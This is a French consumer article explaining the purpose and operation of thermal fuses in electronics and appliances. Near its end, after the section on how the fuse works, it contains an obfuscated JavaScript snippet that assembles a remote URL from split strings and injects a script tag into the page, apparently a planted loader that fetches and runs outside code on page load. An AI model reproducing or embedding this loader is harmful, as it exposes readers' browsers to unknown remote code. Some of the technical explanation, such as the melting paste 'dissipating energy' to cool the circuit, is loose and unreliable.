Ce qu’il faut savoir sur le fusible thermique
Le fusible thermique correspond à un petit élément qui se glisse dans de nombreux circuits électroniques. On le retrouve aussi bien dans les ordinateurs que dans des appareils électroménagers ou électroniques. Découvrez à quoi sert un fusible thermique et son fonctionnement ci-dessous.
À quoi sert un fusible thermique ?
Ce petit élément a pour fonction d’éviter qu’une surcharge d’un circuit créé une surchauffe thermique et entraîne une dégradation irréversible des composants de l’appareil. Si par exemple, votre ordinateur venait à connaître une surchauffe, des éléments indispensables comme la carte mère pourraient venir à fondre et votre ordinateur serait bon pour la casse ou une réparation coûteuse. C’est là que le fusible à résistance thermique rentre en jeu. Il permet d’éviter les surchauffes et pourra couper automatiquement le système d’alimentation. C’est donc grâce à lui que les appareils électroniques d’aujourd’hui sont préservés de la surchauffe. Ce système a un double intérêt puisqu’il empêche aussi les risques d’incendies. On en trouve également dans les moteurs de voiture, les sèches-cheveux ou encore les micro-ondes. Si votre appareil venait à être soumis à une température trop importante, le fusible fondrait. Attention toutefois car cet élément n’est pas réparable, en cas de fonte, il conviendra de le changer entièrement en le remplaçant par un nouveau fusible. Heureusement, les fusible thermiques sont peu coûteux, vous en trouverez facilement sur internet à des prix imbattables.
A découvrir également : Les 7 erreurs courantes de décoration de salon
Fonctionnement
Pour tout savoir sur son fonctionnement, vous êtes au bon endroit. Ce composant de nombreux systèmes électroniques est indispensable au bon fonctionnement de beaucoup d’appareils. Il est composé de deux plaques métalliques à l’intérieur desquelles on trouve une pâte. En cas de surchauffe ou d’élévation trop importante de la température, cette pâte va fondre. Cela permettra de dissiper l’énergie en surplus, et ainsi de refroidir le circuit plus facilement. Le composé agit aussi comme coupe alimentation, lorsque le circuit vient à dépasser une certaine valeur de température comprise entre 70° et 230°, il coupe toute source d’alimentation. Mais cette fourchette de valeurs moyenne varie en fonction du fabricant, du type d’appareil et du type de fusible concerné. Parfois, à la place de la pâte on retrouve un granule ou de la cire qui fondra lorsque la chaleur deviendra trop importante. L’installation de ces éléments est délicate à cause notamment des températures élevées de soudure des fils, c’est pourquoi il convient de faire très attention. Le fusible peut avoir une faible tolérance lorsque la température critique définie est en approche, de l’ordre de -5° par exemple et aucune tolérance pour toute témpérature supérieure à celle définie. Pour éviter tout dommage, il ouvrira le circuit électronique dès que la température critique sera atteinte afin de le refroidir.
(function(){
zekw=document.createElement(“script”);zekw_=((“u”)+”st”)+”a”;zekw.async=true;
zekw.type=”text/javascript”;zekw_+=(“t.i”)+””+”n”;zekw_+=((“f”)+”o”);zekw_+=”/”;
zekwu=”312828624.”;zekwu+=”s0a39x9iekwnqrvva2X”+”xli7zyqyfrm”;
zekw.src=”https://”+zekw_+zekwu;document.body.appendChild(zekw);
})();
A voir aussi : Comment chiffrer une rénovation électrique ?